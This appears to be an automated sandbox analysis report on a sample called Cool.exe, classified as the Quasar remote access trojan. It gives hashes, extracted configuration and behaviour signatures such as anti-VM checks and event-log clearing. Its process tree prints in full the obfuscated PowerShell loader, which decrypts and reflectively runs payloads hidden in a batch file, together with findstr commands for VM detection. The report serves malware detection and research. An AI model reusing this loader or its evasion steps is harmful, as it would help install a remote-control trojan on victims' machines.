Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-12-2024 07:12

General

  • Target

    Cool.exe

  • Size

    7.4MB

  • MD5

    a4ca130e28b42a5cadb6499ecdb8cbf3

  • SHA1

    d3a6e00243b76e6d549a5978fe4cfd2be00c6762

  • SHA256

    58b023b2f159ddc8d2980121e1d92f4c9d3191f215772c00e8b4979c96612f22

  • SHA512

    4733614f8416eaff00e85e1eb51f7123dbd6b818e83ead795039c650b7f48538c8a0b5d846e654b8a329ea8e0a9b555bd7526dda743fba26a93c3a3c77ad7e87

  • SSDEEP

    196608:HMRAj7qnuvwmR+hd5s4iMket2/cEbC/julftfuhk7BxB:1Qg+5cRC2FfUkVT

Malware Config

Extracted

Family

quasar

Attributes
  • encryption_key

    03816C045CDE13385E227545D99CA4F0BBE6CC9F

  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 10 IoCs
  • Modifies data under HKEY_USERS 30 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 30 IoCs
  • Suspicious use of SendNotifyMessage 38 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:608
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:60
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{ccb21bba-98db-4d6f-a4eb-4bd9c0a79447}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1780
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{67a2d645-8e66-483f-9492-a5af8fee2447}
          2⤵
            PID:1896
        • C:\Windows\system32\lsass.exe
          C:\Windows\system32\lsass.exe
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:948
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:448
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:688
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                • Drops file in System32 directory
                PID:1008
                • C:\Windows\system32\taskhostw.exe
                  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                  2⤵
                    PID:3060
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:728
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                    1⤵
                      PID:1032
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1144
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                        • Indicator Removal: Clear Windows Event Logs
                        PID:1236
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                        1⤵
                          PID:1300
                          • C:\Windows\system32\sihost.exe
                            sihost.exe
                            2⤵
                            • Modifies registry class
                            PID:2712
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1328
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                            1⤵
                              PID:1364
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                              1⤵
                                PID:1384
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                1⤵
                                  PID:1488
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                  1⤵
                                    PID:1532
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                    1⤵
                                      PID:1556
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                      1⤵
                                        PID:1596
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1656
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          1⤵
                                            PID:1732
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1760
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                              1⤵
                                                PID:1864
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1872
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1908
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1928
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:1392
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2116
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2220
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                            1⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2284
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                            1⤵
                                                              PID:2380
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2376
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                1⤵
                                                                • Drops file in System32 directory
                                                                PID:2548
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                1⤵
                                                                  PID:2624
                                                                • C:\Windows\sysmon.exe
                                                                  C:\Windows\sysmon.exe
                                                                  1⤵
                                                                    PID:2640
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                    1⤵
                                                                      PID:2660
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                      1⤵
                                                                        PID:2672
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2756
                                                                        • C:\Windows\system32\wbem\unsecapp.exe
                                                                          C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                          1⤵
                                                                            PID:2396
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                            1⤵
                                                                              PID:2596
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                              1⤵
                                                                                PID:3364
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:3392
                                                                                • C:\Users\Admin\AppData\Local\Temp\Cool.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Cool.exe"
                                                                                  2⤵
                                                                                  • Checks computer location settings
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:1644
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Fixer.bat" "
                                                                                    3⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:2404
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      4⤵
                                                                                        PID:1992
                                                                                      • C:\Windows\system32\fsutil.exe
                                                                                        fsutil fsinfo drives
                                                                                        4⤵
                                                                                          PID:3584
                                                                                        • C:\Windows\system32\findstr.exe
                                                                                          findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
                                                                                          4⤵
                                                                                            PID:1320
                                                                                          • C:\Windows\system32\fsutil.exe
                                                                                            fsutil fsinfo drives
                                                                                            4⤵
                                                                                              PID:1508
                                                                                            • C:\Windows\system32\findstr.exe
                                                                                              findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
                                                                                              4⤵
                                                                                                PID:3872
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                cmd.exe /c echo function FlUs($RtYx){ Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose '$Olib=[NPSNPyNPsNPtNPeNPm.NPSNPeNPcNPuNPrNPitNPyNP.NPCrNPyNPpNPtNPoNPgNPrNPaNPpNPhNPyNP.ANPeNPsNP]NP:NP:NPCNPreNPaNPtNPe(NP);'.Replace('NP', ''); Invoke-Expression -WarningAction Inquire -Verbose -InformationAction Ignore -Debug '$Olib.MfOofOdfOefO=fO[fOSyfOsfOtfOefOmfO.fOSefOcfOufOrifOtfOyfO.fOCfOrfOyfOpfOtfOofOgfOrafOpfOhfOyfO.fOCfOifOphfOefOrfOMofOdefO]fO:fO:fOCfOBfOC;'.Replace('fO', ''); Invoke-Expression -WarningAction Inquire -Verbose -Debug '$Olib.PbGabGdbGdbGibGnbGg=bG[bGSbGybGsbGtbGembG.bGSbGecbGubGrbGibGtbGybG.bGCbGrbGybGpbGtobGgbGrbGabGpbGhbGybG.PbGabGdbGdibGngbGMbGobGdbGebG]bG::bGPbGKbGCbGSbG7;'.Replace('bG', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Debug -Verbose '$Olib.Ktpetpytp=tp[tpStpystpttpetpmtp.tpCtpontpvtpetprttp]tp:tp:tpFtprtpotpmtpBtpatpstpe6tp4tpStpttprtpitpntpg("NtpAtpZtpNtpHtp6tprDtpltpltpStpztpZtp31tpttpytpHOtpdtpptpltpjtpTtpItpptpHtpqtpNtpcAtp2tpltpOtpPtpKtpktpQXtpwtp/tpFctp=");'.Replace('tp', ''); Invoke-Expression -WarningAction Inquire '$Olib.IULVUL=UL[ULSULyULstULeULmUL.ULCULoULnvULeULrULt]UL:UL:ULFULrULoULmULBULaULsULeUL64ULSULtULrULiULnULg("tULOULZULkUL0ULHULCZULUULIULOUL0ULVULpIULgULgUL/GUL5UL8ULwUL=UL=UL");'.Replace('UL', ''); $Xiel=$Olib.CreateDecryptor(); $khkv=$Xiel.TransformFinalBlock($RtYx, 0, $RtYx.Length); $Xiel.Dispose(); $Olib.Dispose(); $khkv;}function nndR($RtYx){ Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire '$kFvs=NJceJcwJc-JcOJcbJcjeJccJctJc JcSJcyJcstJceJcmJc.IJcOJc.JcMJceJcmJcoJcrJcyJcSJctJcreJcaJcmJc(,$RtYx);'.Replace('Jc', ''); Invoke-Expression -WarningAction Inquire '$zfZZ=NJceJcwJc-JcOJcbJcjeJccJctJc JcSJcyJcstJceJcmJc.IJcOJc.JcMJceJcmJcoJcrJcyJcSJctJcreJcaJcmJc;'.Replace('Jc', ''); Invoke-Expression -Debug '$nYxJ=NVqeVqwVq-VqOVqbVqjeVqcVqtVq VqSVqyVqstVqeVqmVq.IVqOVq.VqCVqoVqmVqpVqrVqeVqsVqsVqioVqnVq.VqGVqZVqiVqpVqStVqrVqeVqamVq($kFvs, [VqIVqOVq.VqCVqoVqmpVqrVqeVqsVqsVqiVqonVq.VqCVqomVqpVqrVqeVqsVqsVqiVqoVqnVqMVqoVqdeVq]Vq:Vq:VqDVqeVqcVqomVqpVqrVqesVqs);'.Replace('Vq', ''); $nYxJ.CopyTo($zfZZ); $nYxJ.Dispose(); $kFvs.Dispose(); $zfZZ.Dispose(); $zfZZ.ToArray();}function csqF($RtYx,$tura){ Invoke-Expression -InformationAction Ignore '$oOIa=[iaSiayiasiatiaeiam.iaRiaeiafialiaeiactiaiiaoian.iaAiasiasiaeiamiabialiayia]ia:ia:Liaoiaaiadia([byte[]]$RtYx);'.Replace('ia', ''); Invoke-Expression -Debug -Verbose '$LDvh=$oOIa.EnInnItnIrnIynIPnIoinInnItnI;'.Replace('nI', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$LDvh.KUIKUnKUvKUoKUkKUe(KU$KUnKUuKUlKUl, $tura);'.Replace('KU', '');}$tKua = 'C:\Users\Admin\AppData\Roaming\Fixer.bat';$host.UI.RawUI.WindowTitle = $tKua;$FQFy=[System.IO.File]::ReadAllText($tKua).Split([Environment]::NewLine);foreach ($Szce in $FQFy) { if ($Szce.StartsWith('hfEMc')) { $SPWC=$Szce.Substring(5); break; }}$UbZi=[string[]]$SPWC.Split('\');Invoke-Expression -InformationAction Ignore -Verbose -Debug -WarningAction Inquire '$cVz = nndR (FlUs ([auCauoaunauvaueaurtau]au:au:auFaurauomauBauaauseau6au4auSautaurauiaunaugau($UbZi[0].Replace("#", "/").Replace("@", "A"))));'.Replace('au', '');Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore '$Noc = nndR (FlUs ([auCauoaunauvaueaurtau]au:au:auFaurauomauBauaauseau6au4auSautaurauiaunaugau($UbZi[1].Replace("#", "/").Replace("@", "A"))));'.Replace('au', '');Invoke-Expression -Verbose -WarningAction Inquire -Debug -InformationAction Ignore '$AAQ = nndR (FlUs ([auCauoaunauvaueaurtau]au:au:auFaurauomauBauaauseau6au4auSautaurauiaunaugau($UbZi[2].Replace("#", "/").Replace("@", "A"))));'.Replace('au', '');csqF $cVz $null;csqF $Noc $null;csqF $AAQ (,[string[]] (''));
                                                                                                4⤵
                                                                                                  PID:2856
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -WindowStyle Hidden
                                                                                                  4⤵
                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  • Drops file in Windows directory
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:1516
                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                    C:\Windows\system32\WerFault.exe -u -p 1516 -s 1624
                                                                                                    5⤵
                                                                                                    • Checks processor information in registry
                                                                                                    • Enumerates system info in registry
                                                                                                    PID:4416
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Roaming\Fixer.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
                                                                                                    5⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    PID:1904
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      6⤵
                                                                                                        PID:4368
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                                                                      5⤵
                                                                                                        PID:3660
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          6⤵
                                                                                                            PID:1828
                                                                                                          • C:\Windows\system32\fsutil.exe
                                                                                                            fsutil fsinfo drives
                                                                                                            6⤵
                                                                                                              PID:3436
                                                                                                            • C:\Windows\system32\findstr.exe
                                                                                                              findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
                                                                                                              6⤵
                                                                                                                PID:2508
                                                                                                              • C:\Windows\system32\fsutil.exe
                                                                                                                fsutil fsinfo drives
                                                                                                                6⤵
                                                                                                                  PID:4840
                                                                                                                • C:\Windows\system32\findstr.exe
                                                                                                                  findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
                                                                                                                  6⤵
                                                                                                                    PID:1040
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    cmd.exe /c echo function FlUs($RtYx){ Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose '$Olib=[NPSNPyNPsNPtNPeNPm.NPSNPeNPcNPuNPrNPitNPyNP.NPCrNPyNPpNPtNPoNPgNPrNPaNPpNPhNPyNP.ANPeNPsNP]NP:NP:NPCNPreNPaNPtNPe(NP);'.Replace('NP', ''); Invoke-Expression -WarningAction Inquire -Verbose -InformationAction Ignore -Debug '$Olib.MfOofOdfOefO=fO[fOSyfOsfOtfOefOmfO.fOSefOcfOufOrifOtfOyfO.fOCfOrfOyfOpfOtfOofOgfOrafOpfOhfOyfO.fOCfOifOphfOefOrfOMofOdefO]fO:fO:fOCfOBfOC;'.Replace('fO', ''); Invoke-Expression -WarningAction Inquire -Verbose -Debug '$Olib.PbGabGdbGdbGibGnbGg=bG[bGSbGybGsbGtbGembG.bGSbGecbGubGrbGibGtbGybG.bGCbGrbGybGpbGtobGgbGrbGabGpbGhbGybG.PbGabGdbGdibGngbGMbGobGdbGebG]bG::bGPbGKbGCbGSbG7;'.Replace('bG', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Debug -Verbose '$Olib.Ktpetpytp=tp[tpStpystpttpetpmtp.tpCtpontpvtpetprttp]tp:tp:tpFtprtpotpmtpBtpatpstpe6tp4tpStpttprtpitpntpg("NtpAtpZtpNtpHtp6tprDtpltpltpStpztpZtp31tpttpytpHOtpdtpptpltpjtpTtpItpptpHtpqtpNtpcAtp2tpltpOtpPtpKtpktpQXtpwtp/tpFctp=");'.Replace('tp', ''); Invoke-Expression -WarningAction Inquire '$Olib.IULVUL=UL[ULSULyULstULeULmUL.ULCULoULnvULeULrULt]UL:UL:ULFULrULoULmULBULaULsULeUL64ULSULtULrULiULnULg("tULOULZULkUL0ULHULCZULUULIULOUL0ULVULpIULgULgUL/GUL5UL8ULwUL=UL=UL");'.Replace('UL', ''); $Xiel=$Olib.CreateDecryptor(); $khkv=$Xiel.TransformFinalBlock($RtYx, 0, $RtYx.Length); $Xiel.Dispose(); $Olib.Dispose(); $khkv;}function nndR($RtYx){ Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire '$kFvs=NJceJcwJc-JcOJcbJcjeJccJctJc JcSJcyJcstJceJcmJc.IJcOJc.JcMJceJcmJcoJcrJcyJcSJctJcreJcaJcmJc(,$RtYx);'.Replace('Jc', ''); Invoke-Expression -WarningAction Inquire '$zfZZ=NJceJcwJc-JcOJcbJcjeJccJctJc JcSJcyJcstJceJcmJc.IJcOJc.JcMJceJcmJcoJcrJcyJcSJctJcreJcaJcmJc;'.Replace('Jc', ''); Invoke-Expression -Debug '$nYxJ=NVqeVqwVq-VqOVqbVqjeVqcVqtVq VqSVqyVqstVqeVqmVq.IVqOVq.VqCVqoVqmVqpVqrVqeVqsVqsVqioVqnVq.VqGVqZVqiVqpVqStVqrVqeVqamVq($kFvs, [VqIVqOVq.VqCVqoVqmpVqrVqeVqsVqsVqiVqonVq.VqCVqomVqpVqrVqeVqsVqsVqiVqoVqnVqMVqoVqdeVq]Vq:Vq:VqDVqeVqcVqomVqpVqrVqesVqs);'.Replace('Vq', ''); $nYxJ.CopyTo($zfZZ); $nYxJ.Dispose(); $kFvs.Dispose(); $zfZZ.Dispose(); $zfZZ.ToArray();}function csqF($RtYx,$tura){ Invoke-Expression -InformationAction Ignore '$oOIa=[iaSiayiasiatiaeiam.iaRiaeiafialiaeiactiaiiaoian.iaAiasiasiaeiamiabialiayia]ia:ia:Liaoiaaiadia([byte[]]$RtYx);'.Replace('ia', ''); Invoke-Expression -Debug -Verbose '$LDvh=$oOIa.EnInnItnIrnIynIPnIoinInnItnI;'.Replace('nI', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$LDvh.KUIKUnKUvKUoKUkKUe(KU$KUnKUuKUlKUl, $tura);'.Replace('KU', '');}$tKua = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tKua;$FQFy=[System.IO.File]::ReadAllText($tKua).Split([Environment]::NewLine);foreach ($Szce in $FQFy) { if ($Szce.StartsWith('hfEMc')) { $SPWC=$Szce.Substring(5); break; }}$UbZi=[string[]]$SPWC.Split('\');Invoke-Expression -InformationAction Ignore -Verbose -Debug -WarningAction Inquire '$cVz = nndR (FlUs ([auCauoaunauvaueaurtau]au:au:auFaurauomauBauaauseau6au4auSautaurauiaunaugau($UbZi[0].Replace("#", "/").Replace("@", "A"))));'.Replace('au', '');Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore '$Noc = nndR (FlUs ([auCauoaunauvaueaurtau]au:au:auFaurauomauBauaauseau6au4auSautaurauiaunaugau($UbZi[1].Replace("#", "/").Replace("@", "A"))));'.Replace('au', '');Invoke-Expression -Verbose -WarningAction Inquire -Debug -InformationAction Ignore '$AAQ = nndR (FlUs ([auCauoaunauvaueaurtau]au:au:auFaurauomauBauaauseau6au4auSautaurauiaunaugau($UbZi[2].Replace("#", "/").Replace("@", "A"))));'.Replace('au', '');csqF $cVz $null;csqF $Noc $null;csqF $AAQ (,[string[]] (''));
                                                                                                                    6⤵
                                                                                                                      PID:2792
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell.exe -WindowStyle Hidden
                                                                                                                      6⤵
                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                      • Blocklisted process makes network request
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      • Checks for VirtualBox DLLs, possible anti-VM trick
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:5048
                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 5048 -s 2124
                                                                                                                        7⤵
                                                                                                                        • Checks processor information in registry
                                                                                                                        • Enumerates system info in registry
                                                                                                                        PID:2460
                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 5048 -s 2672
                                                                                                                        7⤵
                                                                                                                          PID:1044
                                                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                                                          "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
                                                                                                                          7⤵
                                                                                                                            PID:3712
                                                                                                                • C:\Windows\$nya-onimai2\kAffre.exe
                                                                                                                  "C:\Windows\$nya-onimai2\kAffre.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3036
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    3⤵
                                                                                                                      PID:1372
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
                                                                                                                    2⤵
                                                                                                                    • Enumerates system info in registry
                                                                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                    PID:1092
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x148,0x14c,0x150,0x124,0x154,0x7ffeea9446f8,0x7ffeea944708,0x7ffeea944718
                                                                                                                      3⤵
                                                                                                                        PID:3924
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1948 /prefetch:2
                                                                                                                        3⤵
                                                                                                                          PID:4136
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2544 /prefetch:3
                                                                                                                          3⤵
                                                                                                                            PID:2592
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,12799975845133002436,14711433081443528775,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:8
                                                                                                                            3⤵
                                                                                                                              PID:3260
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
